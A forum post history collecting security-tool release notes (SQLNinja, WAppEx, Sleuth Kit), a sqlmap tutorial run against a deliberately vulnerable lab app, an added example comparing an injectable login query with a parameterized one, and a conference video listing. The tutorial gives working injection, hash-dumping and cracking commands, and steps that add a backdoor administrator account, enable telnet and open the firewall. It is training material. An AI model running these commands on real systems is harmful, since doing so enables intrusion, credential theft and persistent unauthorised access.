Everything posted by Nytro
-
[h=1]SQLNinja 0.2.999-alpha1[/h]
by Mayuresh on February 6, 2013

We finally have a SQLNinja update! We first covered the awesome tool here! We now have SQLNinja version 0.2.999-alpha1! This is the first alpha of the new release, with all the newest cool stuff like data extraction via WAITFOR and DNS tunnel, plus vbscript-based upload!

Sqlninja is an exploitation tool to be used against web apps based on MS SQL Server that are vulnerable to SQL Injection attacks, in order to get a shell also in very hostile conditions.

“Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.”

[h=2]Change log for SQLNinja 0.2.999-alpha1:[/h]
[*] Added data extraction module
[*] Added vbscript-based upload
[*] Split big ugly script into modules
[*] Lots of refactoring

[h=3]Download SQLNinja 0.2.999-alpha1:[/h]
SQLNinja 0.2.999-alpha1 – sqlninja-0.2.999-alpha1.tgz 0.2.999-alpha1

Source: SQLNinja version 0.2.999-alpha1! — PenTestIT
-
[h=1]WAppEx 2.0![/h]
by Mayuresh on February 6, 2013

Our first post about WAppEx can be found here. Recently, an update – WAppEx 2.0 was made available! This release is a huge leap from the previous one (version 1.0) and as such has been given a major version increment. It is nothing short of a total remake of the whole software! In favour of greater extensibility and flexibility WAppEx 2.0 has all the exploitation logic moved to a core exploit database. The full-fledged exploit database not only provides the good old exploits with a lot of new features, but also stands for sharing, updating, extending and more. The database is rich with new payloads, and major improvements have been made to the existing payloads and exploits.

Now you can unleash massive security tests by executing a batch test of multiple exploits against multiple targets; all in one single action. The Test-on-Targets feature automates much of the tasks you would have to do manually in the previous version. Still in addition to all this, a shining toolbox of new tools has been added to the suite. Some of the new tools added are Manual Request, Dork Finder, Exploit Editor, Hidden File Checker, and Neighbor Site Finder!

“WAppEx is an integrated Web Application security assessment and exploitation platform designed with the whole spectrum of security professionals to web application hobbyists in mind. It suggests a security assessment model which revolves around an extensible exploit database. Further, it complements the power with various tools required to perform all stages of a web application attack.”

[h=2]Changes made to WAppEx 2.0:[/h]
[*] Auto-detect feature deleted from exploits
[*] Browser tool deleted
[*] Exploits and payloads view changed
[*] Exploit Database with the following features added:
    [*] New script syntax and structure
    [*] Searching, selecting, and executing of exploits.
    [*] Add/remove database entries (exploits or payloads)
    [*] Add exploits or payloads to the database using either the Exploit Wizard or the script file
    [*] Batch testing of multiple targets against multiple exploits
    [*] Execute multiple instances of one or more payloads (for every running exploit) simultaneously.
[*] Following tools added:
    [*] Manual Request
    [*] Dork Finder
    [*] Exploit Editor
    [*] Hidden File Checker
    [*] Neighbor Site Finder
[*] Local File Inclusion analyzer script updated
[*] 24 new payloads for LFI, RFI, and PHP Code Execution vulnerabilities added: Directory Explorer CodeExec Bind 3 connect-back shells Code Execution MySQL Dump ServerInfo 4 command execution payloads
[*] Bug-fixes:
    [*] Find Login Page crashed on start
    [*] Problem with software registration
    [*] Stop button did not work when retrieving data from SQL server
    [*] Problem with saving SQL results
    [*] Crashed when closing Find Login Page
    [*] Status icons were not displayed properly in exploit tabs

[h=3]Download WAppEx:[/h]
WAppEX 2.0 – WAppEx2.0.exe

Source: WAppEx version 2.0! — PenTestIT
-
[h=1]Sleuth Kit 4.0.2![/h]
by Mayuresh on February 6, 2013

Two days ago, The Sleuth Kit was updated! We now have The Sleuth Kit version 4.0.2. Our first post about The Sleuth Kit or TSK can be found here. This release has bug fixes and some new minor features.

“The Sleuth Kit (TSK) is a library and collection of command line tools that allow you to investigate volume and file system data. It is a collection of open source file system forensics tools that allow one to view allocated and deleted data from NTFS, FAT, FFS, and EXT2FS images. The Autopsy Forensic Browser provides a graphical interface to The Sleuth Kit. The Sleuth Kit is an open source forensic toolkit for analyzing Microsoft and UNIX file systems and disks. The Sleuth Kit enables investigators to identify and recover evidence from images acquired during incident response or from live systems. The Sleuth Kit is open source, which allows investigators to verify the actions of the tool or customize it to specific needs.”

[h=2]Official change log for The Sleuth Kit:[/h]
New Features in Core:
[*] fiwalk is now included.

Bug Fixes in Core:
[*] Fixed fcat to work on NTFS files (still doesn’t support ADS though).
[*] Fixed HFS+ support in tsk_loaddb / SQLite — root directory was not added.
[*] NTFS code now looks at all MFT entries when listing directory contents. It used to only look at unallocated entries for orphan files. This fixes an image that had allocated files missing from the directory b-tree.
[*] NTFS code uses sequence number when searching MFT entries for all files.
[*] Libewf detection code change to support v2 API more reliably (ID: 3596212).
[*] NTFS $SII code could crash in rare cases if $SDS was multiple of block size.

Framework:
[*] Added new API to TskImgDB that returns the base name of an image.
[*] Numerous performance improvements to framework.
[*] Removed requirement in framework to specify module extension in pipeline configuration file.
[*] Added blackboard artifacts to represent both operating system and network service user accounts.

Java Bindings:
[*] More methods to query files
[*] Methods to get current directory when being added to DB.
[*] Modified class structure a bit
[*] More lazy loading for children / parents.
[*] Better exception throwing from C++

[h=3]Download The Sleuth Kit:[/h]
The Sleuth Kit 4.0.2 – sleuthkit-win32-4.0.2.zip/sleuthkit-framework-win32-4.0.2.zip/sleuthkit-4.0.2.tar.gz

Source: The Sleuth Kit 4.0.2! — PenTestIT
-
+ Java SE Proof Of Concept Code ? Packet Storm
-
[h=1]Video Tutorial: Basics of using sqlmap automated sql injection audit tool[/h]
Posted by webpwnized in Information Security on Feb 6, 2013 6:01:03 AM

Author: Jeremy Druin
Twitter: @webpwnized
YouTube Channel: webpwnized's channel - YouTube
Software required: Backtrack 5 R3 with sqlmap, Mutillidae Web Pen Test Training Environment (hxxp://sourceforge.net/projects/mutillidae/files/mutillidae-project/)

Recorded at the ISSA Kentuckiana February 2013 Workshop, this video reviews the use of sqlmap, an automated sql injection audit tool. The video walks through using sqlmap to locate an sql injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there are large amounts of documentation on this feature already.

Environment

The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is installed. Mutillidae may also be installed on WAMPP or LAMP stacks including being able to be installed on Linux. Using two hosts is not necessary to recreate the lab exercise. All of the items can be reproduced on "localhost". The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the sql injection was carried out.

Notes from Presentation

Please find notes from the talk below which can be used to follow along with the video.

--------------------------------------------------
Running SQLMAP Help
--------------------------------------------------
--help    Help
-hh       Double the help

--------------------------------------------------
Running SQLMAP "Manually"
--------------------------------------------------
./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner

--------------------------------------------------
Capturing Request To Pass To SQLMAP
--------------------------------------------------
URL: http://192.168.56.102/mutillidae/index.php?page=login.php

Request:
POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.56.102/mutillidae/index.php?page=login.php
Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

username=asdf&password=asdf&login-php-submit-button=Login

--------------------------------------------------
Running SQLMAP with "auto-parse"
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

--------------------------------------------------
Running SQLMAP with various features
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

--banner

web server operating system: Windows
web application technology: PHP 5.4.4, Apache 2.4.2
back-end DBMS: MySQL 5.0
banner: '5.5.25a'

--fingerprint

web server operating system: Windows
web application technology: PHP 5.4.4, Apache 2.4.2
back-end DBMS: active fingerprint: MySQL >= 5.5.0

--current-user    Retrieve DBMS current user
--current-db      Retrieve DBMS current database
--hostname        Retrieve DBMS server hostname
--is-dba          Detect if the DBMS current user is DBA

current user: 'root@localhost'
current database: 'nowasp'
current user is DBA: True
hostname: 'mutillid-7se1xr'

--users           Enumerate DBMS users
--passwords       Enumerate DBMS users password hashes

database management system users
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'

--dbs             Enumerate DBMS databases

available databases[10]:
[*] cdcol
[*] information_schema
[*] mysql
[*] nowasp
[*] owasp10
[*] owasp13
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

--------------------------------------------------
Enumerate DBMS database tables, columns, structure (schema)
--------------------------------------------------
--tables            Enumerate DBMS database tables
--columns           Enumerate DBMS database table columns
--schema            Enumerate DBMS schema
--count             Retrieve number of entries for table(s)
--exclude-sysdbs    Exclude DBMS system databases when enumerating tables
-D DB               DBMS database to enumerate
-T TBL              DBMS database table to enumerate
-C COL              DBMS database table column to enumerate
-U USER             DBMS user to enumerate

--------------------------------------------------
Extracting data
--------------------------------------------------
--dump                 Dump DBMS database table entries
--dump-all             Dump all DBMS databases tables entries
-D DB                  DBMS database to enumerate
-T TBL                 DBMS database table to enumerate
-C COL                 DBMS database table column to enumerate
-U USER                DBMS user to enumerate
--exclude-sysdbs       Exclude DBMS system databases when enumerating tables
--start=LIMITSTART     First query output entry to retrieve
--stop=LIMITSTOP       Last query output entry to retrieve
--sql-query=QUERY      SQL statement to be executed
--sql-shell            Prompt for an interactive SQL shell

--------------------------------------------------
Listing columns from tables
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'"

select column_name from information_schema.columns where table_name = 'user' [42]:
[*] Alter_priv
[*] Alter_routine_priv
[*] authentication_string
[*] Create_priv
[*] Create_routine_priv
[*] Create_tablespace_priv
[*] Create_tmp_table_priv
[*] Create_user_priv
[*] Create_view_priv
[*] Delete_priv
[*] Drop_priv
[*] Event_priv
[*] Execute_priv
[*] File_priv
[*] Grant_priv
[*] Host
[*] Index_priv
[*] Insert_priv
[*] Lock_tables_priv
[*] max_connections
[*] max_questions
[*] max_updates
[*] max_user_connections
[*] Password
[*] plugin
[*] Process_priv
[*] References_priv
[*] Reload_priv
[*] Repl_client_priv
[*] Repl_slave_priv
[*] Select_priv
[*] Show_db_priv
[*] Show_view_priv
[*] Shutdown_priv
[*] ssl_cipher
[*] ssl_type
[*] Super_priv
[*] Trigger_priv
[*] Update_priv
[*] User
[*] x509_issuer
[*] x509_subject

--------------------------------------------------
Advanced: Modifying injections
--------------------------------------------------
SELECT * FROM accounts WHERE username='' AND password='''

./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner

--prefix=PREFIX    Injection payload prefix string
--suffix=SUFFIX    Injection payload suffix string

--------------------------------------------------
Advanced: Dealing with inconsistent results
--------------------------------------------------
select User, Password from mysql.user

versus

./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc"

select User, Password from mysql.user order by User desc

select User, Password, Host, authentication_string from mysql.user order by User desc [9]:
[*] root, , localhost,
[*] root, , linux,
[*] pma, , localhost,
[*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost,
[*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost,
[*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost,
[*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost,
[*] , , localhost,
[*] , , linux,

--------------------------------------------------
Cracking MySQL Password Hashes
--------------------------------------------------
John the Ripper Command Line

/pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes

Password Hashes in MySQL Format

Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032
Patches:*2027D9391E714343187E07ACB41AE8925F30737E
Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B

--------------------------------------------------
Understanding sqlmap O/S Shell
--------------------------------------------------
View transaction: tcpdump -i eth1 -vvv -X

1st Stage Uploader
2nd Stage Command Shell Page

sc query state= all
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
net user root toor /add
net localgroup TelnetClients /add
net localgroup Administrators root /add
net localgroup TelnetClients root /add
netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

--------------------------------------------------
Interacting Directly with sqlmap O/S Shell Backdoor
--------------------------------------------------
http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101

--------------------------------------------------
Direct connection to the database
--------------------------------------------------
Installing Py-MySQL Dependency

git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL
python setup.py install
cd ..
rm -rf PyMySQL

./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10

Source: https://community.rapid7.com/community/infosec/blog/2013/02/06/video-tutorial-basics-of-using-sqlmap-automated-sql-injection-audit-tool
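The login query shown under "Advanced: Modifying injections" in the notes above, built the vulnerable way beside its parameterized form. This is an added example, not code from the talk or from Mutillidae; it assumes an in-memory SQLite database standing in for the lab's MySQL/PHP stack, and the function names and account rows are hypothetical.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the lab's accounts table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("admin", "s3cret-constructed"), ("simba", "pw-constructed")],
    )
    return db


def login_concatenated(db, username, password):
    """Vulnerable form: user input is pasted between the quotes of the statement.

    A lone quote in the password yields exactly the broken statement from the
    notes (... password='''), and input ending in the notes' suffix '--
    comments out the password check.
    """
    query = (
        "SELECT * FROM accounts WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return db.execute(query).fetchone()


def login_parameterized(db, username, password):
    """Hardened form: the statement text is fixed, input is bound as data only."""
    query = "SELECT * FROM accounts WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone()


def outcome(login, db, username, password):
    """Classify one login attempt as 'authenticated', 'rejected' or 'sql-error'.

    A database syntax error triggered by form input is the signal worth
    alerting on: it means input reached the SQL parser as code.
    """
    try:
        row = login(db, username, password)
    except sqlite3.Error:
        return "sql-error"
    return "authenticated" if row else "rejected"


# Constructed test inputs: (label, username, password)
SAMPLES = [
    ("valid credentials", "admin", "s3cret-constructed"),
    ("lone quote in password", "", "'"),
    ("quote plus comment suffix", "admin'-- ", "wrong"),
]


def compare():
    """Run every sample through both implementations and return the results."""
    db = make_db()
    return [
        (label,
         outcome(login_concatenated, db, user, pw),
         outcome(login_parameterized, db, user, pw))
        for label, user, pw in SAMPLES
    ]


if __name__ == "__main__":
    for label, vulnerable, hardened in compare():
        print(f"{label:28} concatenated={vulnerable:14} parameterized={hardened}")
```
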
-
Linux.conf.au 2013 Videos

We've released these videos as quickly as possible so that people can enjoy the many great talks at LCA this year, and so we can get our rendering gear out of the venue. We know some of these may have problems, but most of them are working and tested. Please let us know if there's anything that is mistitled, short or otherwise incorrect and we'll deal with it as soon as possible.

Helpful debugging information: if the closing screen (the balloons over old Parliament House) doesn't show at the end of the talk, then the file was partly rendered but the render machine probably locked up. If the closing screen shows but the talk was incomplete, then some parts of the talk may be missing, or we might simply have mistakenly unselected one of the raw video files. The former case is easily recoverable; the latter may be impossible to fix without a time machine but may also be recoverable. Let us know either way.

Things we can't fix: Sir Tim Berners-Lee's keynote on Friday and DSD and Open Source on Wednesday. We don't have permission to record the video for those talks. Sorry, if you weren't there, you've missed it.

Videos we know have problems:
[*] Bdale Garbee's Keynote on Monday - missing. Unfortunately our video capture system failed on us and we captured this on four DV tapes. I've got the 32GB of video of this on a hard disk, and I've cut together a full video in PiTiVi but it seems to refuse to render it. I will be trying Cinelerra to see if that works, or if restarting my PiTiVi project from scratch fixes it. This is a long job and will have to wait for the moment - Paul, 5/2/13.
[*] Miniconf videos. These were captured and are on file but the schedule in the video processing system is out of date. I'm going to try importing the latest schedule and seeing if that fixes it without also breaking every other talk. If not, I'll recreate the schedule by hand - Paul, 5/2/13.
[*] Ain't No Party Like A Unix Party - mislabeled talk (thanks Tim Suess). Daniel Black notes that this might be mislabeled as 'Touch And Go - Modern User Interfaces Using Open Source'. This is probably a schedule mismatch and hopefully an easy fix - Paul, 5/2/13.
[*] Why Kernel space sucks - audio drops at end (thanks Neil Brown). This is probably unrecoverable but I'll review it - Paul, 5/2/13.
[*] Bufferbloat from a Plumber's point of view (mp4) - only the end of the talk (thanks Dave Taht and Andrew McDonnell). This may be a missing or incorrectly skipped DV file - will review - Paul, 5/2/13.
[*] The future of nonvolatile memory (ogv) - truncated (thanks Neil Brown). Probably one of the render nodes locked up during rendering - will re-render - Paul, 5/2/13.
[*] High Speed Data Acquisition - missing (thanks Andrew McDonnell). I know we have this talk, I'm just not sure why it hasn't been rendered - will fix - Paul, 5/2/13.
[*] Copyright's Dark Clouds - Optus v NRL (ogv), Free and Open Source Software and Activism (ogv), Openstack on Openstack - a single management API for all your servers (ogv and mp4), and Using open source in over 1100 schools in New Zealand (ogv) - all truncated (thanks Ambrose Andrews, Robert Collins and Daniel Bryant). These are definitely rendering errors and we'll rebuild them - Paul, 5/2/13.
[*] The IPocalypse 20 months later (mp4) and RealTime Response on Multicore Systems - It is bigger than I thought (mp4) - both shorter than expected (thanks Ashley Hull). Probably render node failure, will reprocess - Paul, 5/2/13.
[*] Linux Gaming At Last - Tuning Open Source Graphics Drivers for Valve Software (ogv) - seems to skip at about 0:12:39 and resolve the problem soon after (thanks Phil Ingram). This may have been a rendering issue, will reprocess to try and fix it - Paul, 6/2/13.

Thanks to everyone who's reported problems - it's not a perfect system, but check back here after Wednesday 6th February for updates. The overall response to getting the videos up quickly rather than perfectly has been very positive - thanks for your support!
Paul Wayper, AV Wrangler

[TABLE]
[TR][TH]Name[/TH][TH]Last modified[/TH][TH]Size[/TH][/TR]
[TR][TD]3D_Printing_with_Repsnapper.mp4[/TD][TD=align: right]02-Feb-2013 18:00[/TD][TD=align: right]88M[/TD][/TR]
[TR][TD]15MW_and_3600_penguins_in_a_room_Supercomputing_at_ANU.mp4[/TD][TD=align: right]03-Feb-2013 17:42[/TD][TD=align: right]91M[/TD][/TR]
[TR][TD]A_New_Linux_Platform_Hardware_and_Software.mp4[/TD][TD=align: right]03-Feb-2013 16:55[/TD][TD=align: right]81M[/TD][/TR]
[TR][TD]After_Arduino.mp4[/TD][TD=align: right]04-Feb-2013 10:13[/TD][TD=align: right]66M[/TD][/TR]
[TR][TD]An_Introduction_to_Linux_IPC_Facilities.mp4[/TD][TD=align: right]03-Feb-2013 12:21[/TD][TD=align: right]260M[/TD][/TR]
[TR][TD]ArduSat_Open_Source_in_orbit.mp4[/TD][TD=align: right]02-Feb-2013 19:21[/TD][TD=align: right]86M[/TD][/TR]
[TR][TD]Beyond_Alt_Text_What_Every_Project_Should_Know_About_Accessibility.mp4[/TD][TD=align: right]04-Feb-2013 09:45[/TD][TD=align: right]58M[/TD][/TR]
[TR][TD]Big_and_Little_Endian_inside_out.mp4[/TD][TD=align: right]04-Feb-2013 10:25[/TD][TD=align: right]112M[/TD][/TR]
[TR][TD]Bufferbloat_from_a_Plumbers_point_of_view.mp4[/TD][TD=align: right]02-Feb-2013 17:46[/TD][TD=align: right]7.6M[/TD][/TR]
[TR][TD]Building_Persona_federated_and_privacysensitive_identity_for_the_Web.mp4[/TD][TD=align: right]03-Feb-2013 17:41[/TD][TD=align: right]23M[/TD][/TR]
[TR][TD]Building_a_free_software_telemetry_radio_system.mp4[/TD][TD=align: right]02-Feb-2013 21:05[/TD][TD=align: right]63M[/TD][/TR]
[TR][TD]Ceph_Managing_A_Distributed_Storage_System_At_Scale.mp4[/TD][TD=align: right]03-Feb-2013 17:42[/TD][TD=align: right]81M[/TD][/TR]
[TR][TD]Ceph_object_storage_block_storage_file_system_replication_massive_scalability_and_then_some.mp4[/TD][TD=align: right]03-Feb-2013 16:18[/TD][TD=align: right]155M[/TD][/TR]
[TR][TD]Checkpoint_and_Restore_are_we_there_yet.mp4[/TD][TD=align: right]02-Feb-2013 18:51[/TD][TD=align: right]48M[/TD][/TR]
[TR][TD]Code_up_your_own_video_conference_in_HTML5.mp4[/TD][TD=align: right]02-Feb-2013 19:08[/TD][TD=align: right]66M[/TD][/TR]
[TR][TD]Concurrent_Programming_with_the_Disruptor.mp4[/TD][TD=align: right]02-Feb-2013 20:05[/TD][TD=align: right]54M[/TD][/TR]
[TR][TD]Conference_Closing.mp4[/TD][TD=align: right]03-Feb-2013 17:35[/TD][TD=align: right]210M[/TD][/TR]
[TR][TD]Conference_Closing_Lightning_Talks.mp4[/TD][TD=align: right]03-Feb-2013 17:20[/TD][TD=align: right]124M[/TD][/TR]
[TR][TD]Copyrights_Dark_Clouds_Optus_v_NRL.mp4[/TD][TD=align: right]02-Feb-2013 19:11[/TD][TD=align: right]3.0M[/TD][/TR]
[TR][TD]Designing_a_Verifiable_and_Accessible_Electronic_Voting_System.mp4[/TD][TD=align: right]02-Feb-2013 20:07[/TD][TD=align: right]2.5M[/TD][/TR]
[TR][TD]Droids_that_talk_Pairing_Codec2_and_Android.mp4[/TD][TD=align: right]04-Feb-2013 13:20[/TD][TD=align: right]31M[/TD][/TR]
[TR][TD]Free_and_open_source_software_and_activism.mp4[/TD][TD=align: right]04-Feb-2013 13:10[/TD][TD=align: right]167K[/TD][/TR]
[TR][TD]Future_directions_for_the_X_Window_System.mp4[/TD][TD=align: right]04-Feb-2013 09:45[/TD][TD=align: right]87M[/TD][/TR]
[TR][TD]Geeks_rule_over_kings_the_Distributed_Democracy.mp4[/TD][TD=align: right]02-Feb-2013 19:20[/TD][TD=align: right]3.0M[/TD][/TR]
[TR][TD]Getting_older_Tips_tricks_for_designing_inclusive_open_source_user_interfaces.mp4[/TD][TD=align: right]02-Feb-2013 18:48[/TD][TD=align: right]31M[/TD][/TR]
[TR][TD]Git_For_Ages_4_And_Up.mp4[/TD][TD=align: right]02-Feb-2013 22:52[/TD][TD=align: right]342M[/TD][/TR]
[TR][TD]Git_not_just_for_source_code_anymore.mp4[/TD][TD=align: right]02-Feb-2013 20:29[/TD][TD=align: right]74M[/TD][/TR]
[TR][TD]Graphics_from_Gamepads_Guitars_and_Gadgets_Galore.mp4[/TD][TD=align: right]03-Feb-2013 18:12[/TD][TD=align: right]83M[/TD][/TR]
[TR][TD]HEADER.html[/TD][TD=align: right]06-Feb-2013 11:05[/TD][TD=align: right]4.4K[/TD][/TR]
[TR][TD]Heat_Orchestrating_multiple_cloud_applications_on_OpenStack_using_templates.mp4[/TD][TD=align: right]03-Feb-2013 16:38[/TD][TD=align: right]87M[/TD][/TR]
[TR][TD]How_Mozilla_draws_the_line_between_configuration_and_data_while_using_configuration_management_tools.mp4[/TD][TD=align: right]04-Feb-2013 09:27[/TD][TD=align: right]69M[/TD][/TR]
[TR][TD]How_to_Fix_a_Font.mp4[/TD][TD=align: right]03-Feb-2013 00:15[/TD][TD=align: right]77M[/TD][/TR]
[TR][TD]How_to_make_almost_anything_go_faster.mp4[/TD][TD=align: right]03-Feb-2013 00:02[/TD][TD=align: right]51M[/TD][/TR]
[TR][TD]How_to_use_Puppet_like_an_Adult.mp4[/TD][TD=align: right]03-Feb-2013 11:56[/TD][TD=align: right]85M[/TD][/TR]
[TR][TD]Keynote_Andrew_Bunnie_Huang.mp4[/TD][TD=align: right]03-Feb-2013 01:37[/TD][TD=align: right]77M[/TD][/TR]
[TR][TD]Keynote_Radia_Perlman.mp4[/TD][TD=align: right]03-Feb-2013 11:33[/TD][TD=align: right]117M[/TD][/TR]
[TR][TD]LTTng_20_Advanced_Linux_tracing_for_everyone.mp4[/TD][TD=align: right]04-Feb-2013 12:19[/TD][TD=align: right]86M[/TD][/TR]
[TR][TD]Lighting_up_OpenCV_with_Ne10_and_NEON.mp4[/TD][TD=align: right]04-Feb-2013 09:34[/TD][TD=align: right]56M[/TD][/TR]
[TR][TD]Linux_Gaming_at_Last_Tuning_Open_Source_Graphics_Drivers_for_Valve_Software.mp4[/TD][TD=align: right]02-Feb-2013 20:19[/TD][TD=align: right]35M[/TD][/TR]
[TR][TD]Main_conference_opening.mp4[/TD][TD=align: right]02-Feb-2013 17:57[/TD][TD=align: right]84M[/TD][/TR]
[TR][TD]Make_your_software_understand_your_nonUS_accent.mp4[/TD][TD=align: right]02-Feb-2013 19:08[/TD][TD=align: right]58M[/TD][/TR]
[TR][TD]Making_Mobile_Communications_Secure.mp4[/TD][TD=align: right]04-Feb-2013 11:05[/TD][TD=align: right]116M[/TD][/TR]
[TR][TD]Making_RCU_Respect_Your_Devices_Battery_Lifetime.mp4[/TD][TD=align: right]02-Feb-2013 19:34[/TD][TD=align: right]71M[/TD][/TR]
[TR][TD]Making_UEFI_Secure_boot_work_for_you.mp4[/TD][TD=align: right]02-Feb-2013 21:02[/TD][TD=align: right]79M[/TD][/TR]
[TR][TD]Maximum_Clojure_Performance.mp4[/TD][TD=align: right]02-Feb-2013 21:04[/TD][TD=align: right]71M[/TD][/TR]
[TR][TD]Measuring_and_Improving_OpenGL_Performance.mp4[/TD][TD=align: right]02-Feb-2013 22:03[/TD][TD=align: right]59M[/TD][/TR]
[TR][TD]MySQL_in_the_cloud_as_a_service.mp4[/TD][TD=align: right]03-Feb-2013 17:17[/TD][TD=align: right]166M[/TD][/TR]
[TR][TD]NetFPGA_USB_2_interface.mp4[/TD][TD=align: right]02-Feb-2013 22:40[/TD][TD=align: right]148M[/TD][/TR]
[TR][TD]NovaProva_or_How_I_Did_Six_Impossible_Things_Before_LCA.mp4[/TD][TD=align: right]03-Feb-2013 16:41[/TD][TD=align: right]97M[/TD][/TR]
[TR][TD]OWASP_Developer_Guide_2013_what_it_means_for_open_source_projects.mp4[/TD][TD=align: right]04-Feb-2013 12:24[/TD][TD=align: right]81M[/TD][/TR]
[TR][TD]OpenStack_Zuul.mp4[/TD][TD=align: right]04-Feb-2013 09:53[/TD][TD=align: right]78M[/TD][/TR]
[TR][TD]Open_Source_Digital_Radio.mp4[/TD][TD=align: right]03-Feb-2013 00:06[/TD][TD=align: right]79M[/TD][/TR]
[TR][TD]Open_Source_Firmware.mp4[/TD][TD=align: right]04-Feb-2013 13:05[/TD][TD=align: right]47M[/TD][/TR]
[TR][TD]Open_Source_and_Open_Data_for_Humanitarian_Response_with_OpenStreetMap.mp4[/TD][TD=align: right]03-Feb-2013 00:03[/TD][TD=align: right]96M[/TD][/TR]
[TR][TD]Openstack_on_Openstack_a_single_management_API_for_all_your_servers.mp4[/TD][TD=align: right]04-Feb-2013 09:17[/TD][TD=align: right]1.4M[/TD][/TR]
[TR][TD]Playing_with_OpenStack_Swift.mp4[/TD][TD=align: right]03-Feb-2013 11:57[/TD][TD=align: right]95M[/TD][/TR]
[TR][TD]Ponies_and_Rainbows_Clutter_20_and_GTK_40.mp4[/TD][TD=align: right]03-Feb-2013 17:44[/TD][TD=align: right]106M[/TD][/TR]
[TR][TD]PostgreSQL_92_Full_Throttle_Database.mp4[/TD][TD=align: right]03-Feb-2013 16:09[/TD][TD=align: right]96M[/TD][/TR]
[TR][TD]Pre_dinner_thingy_robert_llewellyn_and_simon_hackett.mp4[/TD][TD=align: right]03-Feb-2013 16:42[/TD][TD=align: right]93M[/TD][/TR]
[TR][TD]Quantitative_community_management.mp4[/TD][TD=align: right]03-Feb-2013 16:07[/TD][TD=align: right]99M[/TD][/TR]
[TR][TD]Quiltwork_patch_deployment_in_nz_and_au.mp4[/TD][TD=align: right]02-Feb-2013 23:11[/TD][TD=align: right]72M[/TD][/TR]
[TR][TD]RAID_is_more_than_parity_and_mirrors.mp4[/TD][TD=align: right]04-Feb-2013 10:04[/TD][TD=align: right]122M[/TD][/TR]
[TR][TD]REPENT_FOR_THE_END_OF_THE_UNIX_EPOCH_IS_NIGH.mp4[/TD][TD=align: right]02-Feb-2013 20:19[/TD][TD=align: right]74M[/TD][/TR]
[TR][TD]RealTime_Response_on_Multicore_Systems_It_Is_Bigger_Than_I_Thought.mp4[/TD][TD=align: right]02-Feb-2013 19:12[/TD][TD=align: right]23M[/TD][/TR]
[TR][TD]Rethinking_CPU_hotplug_for_elegance_and_efficiency.mp4[/TD][TD=align: right]02-Feb-2013 20:04[/TD][TD=align: right]90M[/TD][/TR]
[TR][TD]Ript_a_terse_but_expressive_DSL_for_iptables.mp4[/TD][TD=align: right]02-Feb-2013 21:40[/TD][TD=align: right]68M[/TD][/TR]
[TR][TD]Ristretto_runtime_types_for_JavaScript.mp4[/TD][TD=align: right]03-Feb-2013 17:00[/TD][TD=align: right]83M[/TD][/TR]
[TR][TD]Scratching_your_own_itch_subsurface_diving_log.mp4[/TD][TD=align: right]03-Feb-2013 15:24[/TD][TD=align: right]118M[/TD][/TR]
[TR][TD]Shell_for_Starters.mp4[/TD][TD=align: right]04-Feb-2013 12:09[/TD][TD=align: right]135M[/TD][/TR]
[TR][TD]Software_Transactional_Memory_in_GCC_47.mp4[/TD][TD=align: right]03-Feb-2013 17:14[/TD][TD=align: right]151M[/TD][/TR]
[TR][TD]Stereographic_film_making_and_Linux.mp4[/TD][TD=align: right]02-Feb-2013 23:09[/TD][TD=align: right]86M[/TD][/TR]
